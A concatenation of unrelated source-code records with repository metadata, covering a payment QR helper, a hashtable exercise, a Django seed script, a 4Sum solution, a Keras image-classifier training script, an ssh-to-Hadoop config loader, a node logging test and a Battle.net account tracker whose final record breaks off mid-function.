d4fb2ee822d6c453cf42ce98fa23843e9c9ea94a | 9b4b506bb062564f0016162f9862ea1d111aa94c | /api2.py | 5bab8bb301ab0f184d17ccbc24a7805a41e74b01 | [] | no_license | Tanay-27/paymentapi | 6a95a464583ec35004315f672658073bf53d249b | 356de0339112cc7d178dd4de1d38eda327ab5055 | refs/heads/master | 2022-11-06T22:56:38.298434 | 2020-07-13T15:06:21 | 2020-07-13T15:06:21 | 278,343,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | #from PIL import Image
from final_year.instamojoapi.api1 import createPayment
import qrcode
# Enter amount and purpose,
# in deployment stage this will be automated
#amt = float(input('Enter Amount: '))
#pur = input('Enter Purpose: ')
def qrshow(pur, amt):
    """Create an Instamojo payment request for amount `amt` with purpose
    `pur`, display a QR code pointing at the payment URL, and return the
    URL."""
    # BUG FIX: the original immediately overwrote both arguments with
    # hard-coded test values (amt = 25, pur = "Med"), so every caller got
    # the same payment request.  The parameters are now honored.
    # calling the createPayment function
    url = createPayment(pur, amt)
    # setting advanced parameters for QR code customisation
    qr = qrcode.QRCode(
        version=1,
        error_correction=qrcode.constants.ERROR_CORRECT_L,
        box_size=10,
        border=4,
    )
    # adding the URL for Payment request
    qr.add_data(url)
    qr.make(fit=True)
    img = qr.make_image(fill_color="black", back_color="white")
    # displaying image on screen, further work on this is expected
    img.show()
    return url
"tanayshah@live.com"
] | tanayshah@live.com |
3aff2aaf8f1acb9ba1cecfd827833d7465f5f848 | 23a3d0433bd53f1fd69a8397ee310913038980ea | /06_lesson_5/quiz/lookup.py | 33ace1d20503a122122d5fbb675fc5140599ec69 | [] | no_license | lisalisadong/cs-101 | 3ce2f151386a153770de266624f47879f7796fd3 | 6a001aa27100ce76e7dfa5e6a3528607d3280121 | refs/heads/master | 2020-05-19T23:00:25.857863 | 2015-01-06T06:24:01 | 2015-01-06T06:24:01 | 26,845,527 | 16 | 15 | null | null | null | null | UTF-8 | Python | false | false | 1,094 | py | # Define a procedure,
# hashtable_lookup(htable,key)
# that takes two inputs, a hashtable
# and a key (string),
# and returns the value associated
# with that key.
def hashtable_lookup(htable, key):
    """Return the value stored under `key` in `htable`, or None if absent."""
    bucket = hashtable_get_bucket(htable, key)
    for entry_key, entry_value in bucket:
        if entry_key == key:
            return entry_value
    return None
def hashtable_add(htable, key, value):
    """Append a [key, value] entry to key's bucket (no duplicate check)."""
    hashtable_get_bucket(htable, key).append([key, value])
def hashtable_get_bucket(htable, keyword):
    """Return the bucket (list of [key, value] pairs) that `keyword` hashes to."""
    bucket_index = hash_string(keyword, len(htable))
    return htable[bucket_index]
def hash_string(keyword, buckets):
    """Hash `keyword` into a bucket index in range(buckets).

    Equivalent to the original running-modulus fold: modular reduction
    distributes over addition, so one final %% gives the same result."""
    return sum(ord(ch) for ch in keyword) % buckets
def make_hashtable(nbuckets):
    """Return a hashtable with `nbuckets` empty, independent buckets."""
    # The comprehension builds a fresh list per bucket; [[]] * n would
    # alias one list n times.
    return [[] for _ in range(nbuckets)]
# Smoke test on a hand-built 5-bucket table (Python 2 print statements).
table = [[['Ellis', 11], ['Francis', 13]], [], [['Bill', 17], ['Zoe', 14]],
         [['Coach', 4]], [['Louis', 29], ['Nick', 2], ['Rochelle', 4]]]
print hashtable_lookup(table, 'Francis')
#>>> 13
print hashtable_lookup(table, 'Louis')
#>>> 29
print hashtable_lookup(table, 'Zoe')
#>>> 14
print hashtable_lookup(table, 'Lisa')
| [
"qingxiao.dong@gmail.com"
] | qingxiao.dong@gmail.com |
00e7ce19129243ed2830a59721ab18112af72986 | aad5204456789f32db0e7b63b668910a508e59cf | /carapp/test.py | 718cdcbd8ec6f1047527d922e34f7beb02f22075 | [] | no_license | pc660/CarApp | bc08969d235176b97a2d9f925d463a34e36ebfa6 | 9f3d8a5ec44f70fed9468b3e6fa3bd5079a2e438 | refs/heads/master | 2021-01-10T05:25:11.223926 | 2015-06-18T18:44:35 | 2015-06-18T18:44:35 | 36,813,715 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from prototype.models import *
from prototype.views import *
# Seed-data script: creates one user (with app profile and auth token)
# and three test cars.  NOTE: all inserts run at import time.
# Create user
user = User(username="test1@gmail.com")
user.set_password("111")
user.save()
appuser = AppUser.objects.create(user=user, usertype="0", state="ca", city="mv",
    address="home")
appuser.save()
# Create token
token = Token(username="test1@gmail.com", token="1")
token.save()
# Create Car
car1 = Car(user=user, model="audi", brand="a4", state="ca", city="mv",
    year="1991", price="100", color="black", title="manimabi", miles="123",
    description="bbb", tag1=True, tag2=True)
car1.save()
car2 = Car(user=user, model="BWM", brand="s5", state="ca", city="sj",
    year="1991", price="100", color="black", title="manimabi", miles="123",
    description="bbb", tag1=True, tag3=True)
car2.save()
car3 = Car(user=user, model="tesla", brand="S", state="ca", city="sf",
    year="1991", price="100", color="black", title="manimabi", miles="123",
    description="bbb", tag1=True, tag4=True)
car3.save()
| [
"pc660@hotmail.com"
] | pc660@hotmail.com |
00a8bb3132b8b95eef7a93ce9774764910f2044c | 7aefa20b27474e66e3815d99863c3ee0d8b7a5d0 | /18.1.py | 5e8b53b0d45bae893462f37eac89443824a29d06 | [] | no_license | Christine1225/Leetcode_py3 | 47a16837b3c7b0677a5c40990d4121a906f9833b | 34e10eaf1ec32bc928acb9fa28659c28626a9564 | refs/heads/master | 2020-03-24T17:33:23.510234 | 2019-03-06T09:26:46 | 2019-03-06T09:26:46 | 142,863,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,700 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 14:13:04 2018
@author: Abigail
"""
class Solution:
    """LeetCode 18 (4Sum): all unique quadruplets of `nums` summing to `target`.

    Implemented as a generalized recursive N-sum over a sorted list: fix
    the smallest element and recurse on (n-1)-sum until the n == 2 base
    case, which is solved with a two-pointer scan.
    """

    def find_n_sum(self, sorted_nums, target, n, result_prefix, results):
        """Append to `results` every n-tuple from `sorted_nums` that sums
        to `target`, each prefixed by `result_prefix`.  The int return
        value is an internal status code and is ignored by callers.
        """
        nums_len = len(sorted_nums)
        if n > nums_len:
            return -1
        # Pruning: the n smallest / n largest elements bound reachable sums.
        if (target < sorted_nums[0] * n) or (target > sorted_nums[-1] * n):
            return -2
        if n == 1:
            for num in sorted_nums:
                if num == target:
                    results.append([num])
                    return 0
            return -2
        elif n == 2:
            # Two-pointer scan from both ends of the sorted slice.
            idx_l, idx_r = 0, nums_len - 1
            while idx_l < idx_r:
                element_sum = sorted_nums[idx_l] + sorted_nums[idx_r]
                if element_sum < target:
                    idx_l += 1
                elif element_sum > target:
                    idx_r -= 1
                else:
                    # Found a pair; record it with the accumulated prefix.
                    results.append(result_prefix + [sorted_nums[idx_l], sorted_nums[idx_r]])
                    idx_l += 1
                    idx_r -= 1
                    # Skip duplicate values so each pair is reported once.
                    # FIX: `and` replaces the original bitwise `&`, which
                    # does not short-circuit.
                    while (idx_l < idx_r) and (sorted_nums[idx_l] == sorted_nums[idx_l - 1]):
                        idx_l += 1
                    while (idx_l < idx_r) and (sorted_nums[idx_r] == sorted_nums[idx_r + 1]):
                        idx_r -= 1
            return 0
        else:
            # Fix the smallest element of the n-tuple and recurse on the rest.
            for i in range(0, len(sorted_nums) - n + 1):
                if sorted_nums[i] * n > target:
                    break
                elif (i > 0) and (sorted_nums[i] == sorted_nums[i - 1]):
                    pass  # duplicate smallest element: already explored
                else:
                    self.find_n_sum(sorted_nums[i + 1:],
                                    target - sorted_nums[i],
                                    n - 1,
                                    result_prefix + [sorted_nums[i]],
                                    results)

    def fourSum(self, nums, target):
        """Return all unique quadruplets of `nums` that sum to `target`."""
        sorted_nums = sorted(nums)
        results = []
        self.find_n_sum(sorted_nums, target=target, n=4, result_prefix=[], results=results)
        return results
# Manual smoke test; expected output:
# [[-2, -1, 1, 2], [-2, 0, 0, 2], [-1, 0, 0, 1]]
ss = Solution()
nums = [1, 0, -1, 0, -2, 2]
target= 0
print(ss.fourSum(nums,target)) | [
"zhuyu@megvii.com"
] | zhuyu@megvii.com |
b16fc1d508f96b92a9f454b018a0454764142397 | e86e81152d2c10135cb283d979e53682bcf18182 | /Code/train_parking.py | 1903d46a85f2698768a7837b9816fbf89cbe4f94 | [] | no_license | hachemmosbah/StageCerema | 10ef433492478b7b66b08bd763eae7e45789b455 | 92a84bca44dba6f5c8c35ecb9d963ee7c57eb32d | refs/heads/master | 2023-05-01T18:16:11.573322 | 2021-05-18T15:28:59 | 2021-05-18T15:28:59 | 245,976,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Dense, Activation, Dropout, Flatten
from keras import optimizers
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
from matplotlib import pyplot as plt
# In[2]:
# Step 1: load the data (all images are resized to 150x150).
img_width = 150
img_height = 150
# In[3]:
DATA_train = "/Users/mosbahhachem/Documents/git/StageCerema/code/data/train"
DATA_valid = "/Users/mosbahhachem/Documents/git/StageCerema/code/data/valid"
# In[4]:
# Rescale pixel values from [0, 255] into [0, 1].
datagen = ImageDataGenerator(rescale = 1./255)
# In[5]:
train_generator = datagen.flow_from_directory(directory=DATA_train,target_size=(img_width,img_height),
classes=['parking','non_parking'],class_mode='binary',batch_size=32)
# In[6]:
validation_generator = datagen.flow_from_directory(directory=DATA_valid,target_size=(img_width,img_height),
classes=['parking','non_parking'], class_mode='binary',batch_size=16)
# In[7]:
# Small CNN: two conv/pool/dropout stages, then a dense head with a
# sigmoid output for binary parking / non-parking classification.
model =Sequential()
model.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))
#model.add(BatchNormalization())
model.add(Activation('elu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.5))
model.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))
#model.add(BatchNormalization())
model.add(Activation('elu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(100))
model.add(Activation('elu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
print('model compler!!')
print('train start....')
training = model.fit_generator(generator=train_generator, steps_per_epoch=5000 // 16,epochs=15
,validation_data=validation_generator,validation_steps=832//16)
print('training finished!!')
print('sauvgarde parking_non_parking_test.h5')
# Save the freshly trained model's weights and full architecture to disk.
model.save_weights('/Users/mosbahhachem/Documents/git/StageCerema/code/model/parking_non_parking.h5')
model.save('/Users/mosbahhachem/Documents/git/StageCerema/code/model/parking_non_parking.model')
print('Toutes les sauvgardes avec succées !!')
# In[8]:
# summarize history for accuracy
plt.plot(training.history['accuracy'])
plt.plot(training.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# summarize history for loss
plt.plot(training.history['loss'])
plt.plot(training.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# In[ ]:
# In[ ]:
| [
"hachem.mosbah.data@gmail.com"
] | hachem.mosbah.data@gmail.com |
0bc17732fcd3b35824193d0f5e0fde73fd55f3b0 | 308342069e63736d3d1f56f914a6122d06efee0d | /shell/get_plan_conf.py | cbcd0aa70555c6c2448cae981d5931c49827ea58 | [] | no_license | sengeiou/effect_platform | 1876d78fe06b664f439df57750b5e043b634c976 | 2186ad4993c988dac035771ea6af34e34c7f4abe | refs/heads/master | 2021-06-03T13:29:48.531514 | 2016-08-03T05:57:00 | 2016-08-03T05:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,144 | py | #!/usr/bin/env python
# -*- encoding:utf-8 -*-
'''
从admin_host获取配置文件列表,保存到本地
'''
import os
import sys
from os import path
import optparse
from datetime import datetime
from datetime import timedelta
from ep_config import *
# 全局变量
def get_options():
    '''Parse command-line options; -d takes a date as %Y%m%d (default:
    yesterday).  Returns the parsed datetime.
    '''
    p = optparse.OptionParser(usage="usage: %prog [-d]", version="1.0")
    p.add_option('-v', '--get-version', dest='getVersion', default=False, action='store_true', help='Get version number of plugin')
    p.add_option('-d', action='store', type='string', dest='ydate', default=(datetime.today()-timedelta(days=1)).strftime('%Y%m%d'), help='thedate, %Y%m%d')
    options, arguments = p.parse_args()
    try:
        ydate = datetime.strptime(options.ydate, '%Y%m%d')
    except:
        # NOTE(review): on a bad date this prints an error but still falls
        # through to `return ydate` with `ydate` unbound -> NameError.
        print "ERROR: 参数日期错误"
    return ydate
def get_remote_files(ydate):
    '''
    Copy the plan config files added on `ydate` from the admin_host
    machine into the local temp directory.  Returns the command's exit
    status (0 on success).
    '''
    if not path.exists(local_temp_path) :
        os.makedirs(local_temp_path)
    # Substitution values for the date placeholders in remote_path.
    conf = {
        'YYYY' : ydate.strftime('%Y') ,
        'MM' : ydate.strftime('%m') ,
        'DD' : ydate.strftime('%d') ,
    }
    cmd = "%s %s:%s/* %s" % (ssh_cmd, admin_host, remote_path % conf, local_temp_path)
    print cmd
    os_rt = os.system(cmd)
    if os_rt != 0:
        print "ERROR: %s" % cmd
    return os_rt
def parse_file(file_name):
    '''
    Classify a plan config file in the local temp directory by its
    effective period and path-tree split rule.
    NOTE(review): currently a stub -- always returns ('11', 'none').
    '''
    return '11', 'none'
def move_local_file(period, tree_split, file_name):
    '''
    Move `file_name` from the temp directory into the directory for its
    (period, tree_split) classification.  Returns 0.
    '''
    conf = {'PERIOD':period, 'TREE_SPLIT':tree_split, }
    local_file_path = local_path % conf;
    if not path.exists(local_file_path) :
        os.makedirs(local_file_path)
    os.rename(path.join(local_temp_path, file_name), path.join(local_file_path, file_name))
    return 0
def put_file_to_hadoop(period, tree_split, file_name):
    '''
    Upload the local file to Hadoop, removing any existing copy first.
    Returns the combined command's exit status (0 on success).
    '''
    conf = {'PERIOD':period, 'TREE_SPLIT':tree_split}
    h_conf = {'local_path':local_path % conf, 'hadoop_path':hadoop_path % conf, 'hadoop_cmd':hadoop_cmd, 'file_name':file_name}
    cmd = '''
    %(hadoop_cmd)s dfs -rm %(hadoop_path)s/%(file_name)s
    %(hadoop_cmd)s dfs -put %(local_path)s/%(file_name)s %(hadoop_path)s/%(file_name)s''' % h_conf
    print cmd
    os_rt = os.system(cmd)
    if os_rt != 0:
        print "ERROR: %s" % cmd
    return os_rt
def main():
    '''Fetch remote plan configs, then classify, move, and upload each
    file; returns -1 on the first failure, None on success.'''
    ydate = get_options()
    if ( get_remote_files(ydate) != 0 ):
        return -1
    for file_name in os.listdir(local_temp_path):
        period, tree_split = parse_file(file_name)
        if ( move_local_file(period, tree_split, file_name) != 0 ):
            return -1
        if ( put_file_to_hadoop(period, tree_split, file_name) != 0 ):
            return -1
    pass
# Script entry point: propagate main()'s return value as the exit status.
if __name__ == '__main__':
    sys.exit(main())
| [
"sav2008@gmail.com"
] | sav2008@gmail.com |
1af1d409b84f3dccc002b5fbea7fb658f5c0cdd1 | 3011847d0c09a414250df6208005921da28b3d36 | /pavement.py | ec63ffe1790a4cf8e2f781392005cf1f1fad7871 | [
"MIT"
] | permissive | ihtwang/Bank | 51530a1e8c7e44ae556a8ee054da0a0e42230f01 | e97e23b30a3fead16dfbfb35e60f528ec060131b | refs/heads/master | 2021-08-31T03:48:24.479844 | 2017-12-20T08:36:44 | 2017-12-20T08:36:44 | 114,862,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | from paver.tasks import task, BuildFailure
from paver.easy import sh,needs
@task
def unit_tests():
    """Run the unit-test suite under nose with coverage reporting."""
    sh('nosetests --with-coverage test/unit')
@task
def lettuce_tests():
    """Run the BDD feature tests with lettuce."""
    sh('lettuce test/bdd')
@task
def run_pylint():
    """Lint the bank/ package into pylint.txt.

    BuildFailure is swallowed -- presumably so pylint's nonzero exit code
    (emitted whenever it finds issues) does not fail the build; confirm.
    """
    try:
        sh('pylint --msg-template="{path}:{line}: \
            [{msg_id}({symbol}), {obj}] {msg}" bank/ > pylint.txt')
    except BuildFailure:
        pass
@needs('unit_tests', 'lettuce_tests', 'run_pylint')
@task
def default():
    """Default task: runs tests and lint via the @needs dependencies."""
    pass
| [
"iht_wang@126.com"
] | iht_wang@126.com |
638eacd3d24e97292b989c4546def4130f7fc519 | 5ead4735845e6e4488a1825c903cebda2b963f71 | /seg_intersection_test.py | 501c3ca2dc9b8f9f4fe6c344d895a898853a70f4 | [] | no_license | intdxdt/robustpy | b734d883a57f268c76197f3d365bf406e1709580 | 784ab76534ad54c5eb3a6f98abeabbd6bd017e48 | refs/heads/master | 2020-12-03T02:31:51.847738 | 2017-10-15T05:24:49 | 2017-10-15T05:24:49 | 95,951,361 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | import unittest
from det import det2
from random import random
from rsum import robust_sum as rsum
from compare import robust_compare as cmp
from rprod import robust_product as rprod
from subtract import robust_subtract as rsub
from validate import validate_sequence as validate
from seg_intersection import segment_intersection as seg_intersection
def rnd():
    """Return a uniform random float in [0.0, 1.0)."""
    sample = random()
    return sample
class TestRobustSegIntersection(unittest.TestCase):
    """Randomized tests for the exact (adaptive-precision) segment
    intersection routine: the homogeneous result (x, y, w) must lie on
    both input lines, and must be invariant (up to the w scale) under
    every reordering of endpoints and segments."""
    def test_seg_intersect(self):
        # Point-on-line check via the exact collinearity determinant:
        # | a[0] a[1] 1 |
        # | b[0] b[1] 1 |
        # | x y w |
        def test_pt_seq(a, b, x, y, w):
            d0 = rsum([a[1]], [-b[1]])
            d1 = rsum([a[0]], [-b[0]])
            d2 = det2([[a[0], a[1]], [b[0], b[1]]])
            # validate det.RobustDet2
            self.assertTrue(validate(d2))
            p0 = rprod(x, d0)
            p1 = rprod(y, d1)
            p2 = rprod(w, d2)
            # validate p0
            self.assertTrue(validate(p0))
            # validate p1
            self.assertTrue(validate(p1))
            # validate p2
            self.assertTrue(validate(p2))
            s = rsum(rsub(p0, p1), p2)
            # validate s
            self.assertTrue(validate(s))
            # check point on line
            self.assertTrue(cmp(s, (0.,)) == 0.)
        def verify(a, b, c, d):
            x = seg_intersection(a, b, c, d)
            # validate x
            self.assertTrue(validate(x[0]))
            # validate y
            self.assertTrue(validate(x[1]))
            # validate w
            self.assertTrue(validate(x[2]))
            test_pt_seq(a, b, x[0], x[1], x[2])
            test_pt_seq(c, d, x[0], x[1], x[2])
            p = ((a, b), (c, d))
            # All 8 endpoint/segment orderings (s, r flip endpoints; h
            # swaps segments) must give the same projective point.
            for s in range(0, 2):
                for r in range(0, 2):
                    for h in range(0, 2):
                        y = seg_intersection(p[h][s], p[h][s ^ 1], p[h ^ 1][r], p[h ^ 1][r ^ 1])
                        # validate x
                        self.assertTrue(validate(y[0]))
                        # validate y
                        self.assertTrue(validate(y[1]))
                        # validate w
                        self.assertTrue(validate(y[2]))
                        # check x (cross-multiplied to compare homogeneous coords)
                        self.assertTrue(cmp(rprod(y[0], x[2]), rprod(x[0], y[2])) == 0.)
                        # check y
                        self.assertTrue(cmp(rprod(y[1], x[2]), rprod(x[1], y[2])) == 0.)
        for _ in range(0, 100):
            verify((rnd(), rnd()), (rnd(), rnd()), (rnd(), rnd()), (rnd(), rnd()))
        isect = seg_intersection((-1., 10.), (-10., 1.), (10., 0.), (10., 10.))
        # no intersections: parallel-case result has weight w == 0
        self.assertTrue(isect[2][0] == 0.)
# Module-level runner: builds and executes the suite at import time.
suite = unittest.TestLoader().loadTestsFromTestCase(TestRobustSegIntersection)
unittest.TextTestRunner(verbosity=4).run(suite)
| [
"titus.intdxdt@gmail.com"
] | titus.intdxdt@gmail.com |
19b844921393bc5dad52f8d3e705076a194fd0d0 | d11d4907936ddf1ae2ab37385278295cad8f06e0 | /test/functional/feature_logging.py | 1cf30016a7c5233b2696c72ca8acfd75c85d521e | [
"MIT"
] | permissive | LIMXTEC/BitSend | a2943ba8ad9b2d3b57aec0f99ae3f779e626a170 | 925c258f9976cab08169c67d8e530c0339905e46 | refs/heads/master-0.17 | 2022-05-03T10:02:10.976385 | 2021-03-08T14:29:49 | 2021-03-08T14:29:49 | 39,961,776 | 48 | 65 | MIT | 2021-03-08T14:29:50 | 2015-07-30T16:54:11 | C++ | UTF-8 | Python | false | false | 2,980 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitsend Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test debug logging."""
import os
from test_framework.test_framework import BitsendTestFramework
from test_framework.test_node import ErrorMatch
class LoggingTest(BitsendTestFramework):
    """Exercise -debuglogfile handling: default location, relative and
    absolute overrides, error paths when the parent directory is missing,
    and -nodebuglogfile."""
    def set_test_params(self):
        self.num_nodes = 1
        self.setup_clean_chain = True
    def relative_log_path(self, name):
        """Path of `name` inside node 0's regtest datadir."""
        return os.path.join(self.nodes[0].datadir, "regtest", name)
    def run_test(self):
        # test default log file name
        default_log_path = self.relative_log_path("debug.log")
        assert os.path.isfile(default_log_path)
        # test alternative log file name in datadir
        self.restart_node(0, ["-debuglogfile=foo.log"])
        assert os.path.isfile(self.relative_log_path("foo.log"))
        # test alternative log file name outside datadir
        tempname = os.path.join(self.options.tmpdir, "foo.log")
        self.restart_node(0, ["-debuglogfile=%s" % tempname])
        assert os.path.isfile(tempname)
        # check that invalid log (relative) will cause error
        invdir = self.relative_log_path("foo")
        invalidname = os.path.join("foo", "foo.log")
        self.stop_node(0)
        # NOTE: non-raw string; "\S" passes through to the regex matcher unchanged.
        exp_stderr = "Error: Could not open debug log file \S+$"
        self.nodes[0].assert_start_raises_init_error(["-debuglogfile=%s" % (invalidname)], exp_stderr, match=ErrorMatch.FULL_REGEX)
        assert not os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (relative) works after path exists
        self.stop_node(0)
        os.mkdir(invdir)
        self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
        assert os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (absolute) will cause error
        self.stop_node(0)
        invdir = os.path.join(self.options.tmpdir, "foo")
        invalidname = os.path.join(invdir, "foo.log")
        self.nodes[0].assert_start_raises_init_error(["-debuglogfile=%s" % invalidname], exp_stderr, match=ErrorMatch.FULL_REGEX)
        assert not os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (absolute) works after path exists
        self.stop_node(0)
        os.mkdir(invdir)
        self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
        assert os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that -nodebuglogfile disables logging
        self.stop_node(0)
        os.unlink(default_log_path)
        assert not os.path.isfile(default_log_path)
        self.start_node(0, ["-nodebuglogfile"])
        assert not os.path.isfile(default_log_path)
        # just sanity check no crash here
        self.stop_node(0)
        self.start_node(0, ["-debuglogfile=%s" % os.devnull])
# Script entry point.
if __name__ == '__main__':
    LoggingTest().main()
| [
"joshaf.est@gmail.com"
] | joshaf.est@gmail.com |
dac228f8927d7c13a5a6fb563f080cd23d2323bf | 84b2a3f79458db00407d03958666317c4b7d33aa | /src/run.py | 467c5bb494434e257411dd919b3ceed54fa31515 | [] | no_license | kych02141/bnet-account-tracker | 1fa19dd01e23a6fe23c316a584a64f1a17b6da09 | 4ebf5c8141b9376df7e7d21a092fb334ec83372e | refs/heads/master | 2023-08-26T13:03:08.761589 | 2021-05-31T03:57:26 | 2021-05-31T03:57:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import pyperclip
import time
from account import Account, BanStatus
from console import clear
from profilescraper import get_career_profile
from tabulate import tabulate
from threading import Thread
# Footnote markers appended to "Banned" table cells; explained by print_legend().
LEGEND_BAN_SEASONAL = '†'
LEGEND_BAN_PERMANENT = '††'
def mask_battletag(battletag):
    """Hide the middle digits of a BattleTag's numeric suffix,
    e.g. 'Name#12345' -> 'Name#1***5'."""
    parts = battletag.split('#')
    name, tag_id = parts[0], parts[1]
    masked_id = tag_id[0] + '*' * (len(tag_id) - 2) + tag_id[-1:]
    return "%s#%s" % (name, masked_id)
def mask_email(email):
    """Hide the middle of an email's local part,
    e.g. 'john.doe@x.com' -> 'j******e@x.com'."""
    parts = email.split('@')
    local, domain = parts[0], parts[1]
    masked_local = local[0] + '*' * (len(local) - 2) + local[-1:]
    return "%s@%s" % (masked_local, domain)
def get_accounts(config):
    """Build Account objects from the parsed config dict.

    Each entry of config['accounts'] becomes one Account; ids are
    assigned sequentially starting at 1 in file order.
    """
    accounts = []
    # enumerate(start=1) replaces the original hand-maintained counter.
    for account_index, a in enumerate(config['accounts'], start=1):
        ban = a['ban_status']
        accounts.append(Account(
            account_index,
            a['email'],
            a['battletag'],
            a['country'],
            a['password'],
            a['created'],
            a['sms_protected'],
            BanStatus(ban['banned'],
                      ban['permanent'],
                      ban['seasonal'],
                      ban['expires'])))
    return accounts
def get_avg_sr(accounts, role):
    """Average skill rating across accounts placed in `role` ('tank',
    'damage', or 'support'); returns '-' when no account has a rating."""
    ratings = [getattr(acct.profile, role + "_rating") for acct in accounts]
    placed = [int(sr) for sr in ratings if sr]
    if not placed:
        return '-'
    return int(sum(placed) / len(placed))
def print_account_table():
    """Clear the console and print one table row per account.

    Columns are toggled via config['columns']; emails/battletags are
    masked when the corresponding config flags are set.  Reads the
    module-level `config` and `accounts` globals.
    """
    headers = ['']
    if config['columns']['email']:
        headers.append('Email')
    if config['columns']['battletag']:
        headers.append('BattleTag')
    if config['columns']['country']:
        headers.append('Country')
    if config['columns']['created']:
        headers.append('Created')
    if config['columns']['sms']:
        headers.append('SMS')
    if config['columns']['banned']:
        headers.append('Banned')
    if config['columns']['level']:
        headers.append('Level')
    if config['columns']['tank']:
        headers.append('Tank')
    if config['columns']['damage']:
        headers.append('Damage')
    if config['columns']['support']:
        headers.append('Support')
    table_data = []
    for account in accounts:
        row_data = []
        row_data.append(account.id)
        if config['columns']['email']:
            row_data.append(mask_email(account.email) if config['mask_emails'] else account.email)
        if config['columns']['battletag']:
            row_data.append(mask_battletag(account.battletag) if config['mask_battletags'] else account.battletag)
        if config['columns']['country']:
            row_data.append(account.country)
        if config['columns']['created']:
            row_data.append(account.created)
        if config['columns']['sms']:
            row_data.append('Yes' if account.sms_protected else 'No')
        if config['columns']['banned']:
            # Seasonal/permanent bans get a legend marker; timed bans show
            # their expiration date instead.
            msg = 'Yes' if account.ban_status.banned else 'No'
            if account.ban_status.banned:
                if account.ban_status.seasonal:
                    msg = "%s%s" % (msg, LEGEND_BAN_SEASONAL)
                elif account.ban_status.permanent:
                    msg = "%s%s" % (msg, LEGEND_BAN_PERMANENT)
                else:
                    msg = "%s (%s)" % (msg, account.ban_status.get_expiration().strftime(config['date_format']))
            row_data.append(msg)
        if config['columns']['level']:
            row_data.append(account.profile.level)
        if config['columns']['tank']:
            row_data.append(account.profile.tank_rating if account.profile.tank_rating else '-')
        if config['columns']['damage']:
            row_data.append(account.profile.damage_rating if account.profile.damage_rating else '-')
        if config['columns']['support']:
            row_data.append(account.profile.support_rating if account.profile.support_rating else '-')
        # NOTE(review): clear() runs once per account (inside the loop);
        # it looks like it was meant to run once before printing -- confirm.
        clear()
        table_data.append(row_data)
    tabulate.WIDE_CHARS_MODE = False
    print(tabulate(table_data, headers=headers))
def print_stats():
    """Print a one-row summary table: total levels and per-role average SR."""
    # Accounts whose level is unknown (None) contribute 0 to the total.
    total_levels = sum(a.profile.level if a.profile.level is not None else 0
                       for a in accounts)
    summary_row = [total_levels,
                   get_avg_sr(accounts, "tank"),
                   get_avg_sr(accounts, "damage"),
                   get_avg_sr(accounts, "support")]
    column_names = ['Total Levels', 'Tank Avg', 'Damage Avg', 'Support Avg']
    print(tabulate([summary_row], headers=column_names))
def print_legend():
    """Explain the markers appended to the 'Banned' column of the table."""
    for marker, meaning in ((LEGEND_BAN_SEASONAL, "Seasonal Ban"),
                            (LEGEND_BAN_PERMANENT, "Permanent Ban")):
        print("%s %s" % (marker, meaning))
def prompt_action():
    """Prompt for a 1-based account ID and open the per-account action menu.

    An empty input simply refreshes the account table.  Non-numeric or
    out-of-range IDs are silently ignored, returning to the main loop.
    """
    value = input("\nSelect an account by the ID: ")
    if value == '':  # enter, refresh list
        print_account_table()
    else:
        try:
            # BUG FIX: the original called int() with no argument, which always
            # produced 0 and therefore always selected accounts[-1] (the last
            # account) no matter what the user typed.
            id = int(value)
            account = accounts[id - 1]
            prompt_account_actions(account)
        except IndexError:
            pass  # ID out of range - ignore
        except ValueError:
            pass  # input was not a number - ignore
def prompt_account_actions(account):
    """Show the clipboard menu for one account and perform the chosen action."""
    menu = [
        "[1] Copy email to clipboard",
        "[2] Copy password to clipboard",
        "[3] Copy battletag to clipboard",
        "[4] Go back"
    ]
    for entry in menu:
        print(entry)
    print()
    # Keep prompting until the input parses as an int that maps onto the menu.
    while True:
        try:
            action = int(
                input("What would you like to do with this account: "))
            menu[action - 1]  # raises IndexError for out-of-range choices
            break
        except (IndexError, ValueError):
            pass
    if action == 1:
        pyperclip.copy(account.email)
        print("Email copied to clipboard!")
    if action == 2:
        pyperclip.copy(account.password)
        print("Password copied to clipboard!")
    if action == 3:
        pyperclip.copy(account.battletag)
        print("Battletag copied to clipboard!")
    if action == 4:
        pass  # nothing to do, just fall through
    print("Returning to accounts...")
def load_config():
    """Load and return the JSON configuration from config/config.json."""
    with open('config/config.json', encoding='utf-8') as json_file:
        return json.load(json_file)
def update_account_stats(accounts):
